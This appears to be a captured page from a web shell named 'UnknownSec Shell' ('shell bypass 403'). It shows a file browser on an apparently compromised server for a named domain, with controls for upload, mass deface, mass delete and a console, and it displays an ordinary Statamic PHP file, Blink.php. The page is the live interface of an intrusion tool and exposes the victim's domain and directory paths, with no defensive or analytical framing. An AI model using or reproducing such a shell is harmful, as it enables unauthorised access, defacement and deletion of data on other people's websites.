shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Support
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Blink.php
<?php namespace Statamic\Support; use Spatie\Blink\Blink as SpatieBlink; class Blink { protected $stores = []; public function store($name = 'default') { return $this->stores[$name] = $this->stores[$name] ?? new SpatieBlink; } public function __call($method, $args) { return $this->store()->$method(...$args); } }
© 2026 UnknownSec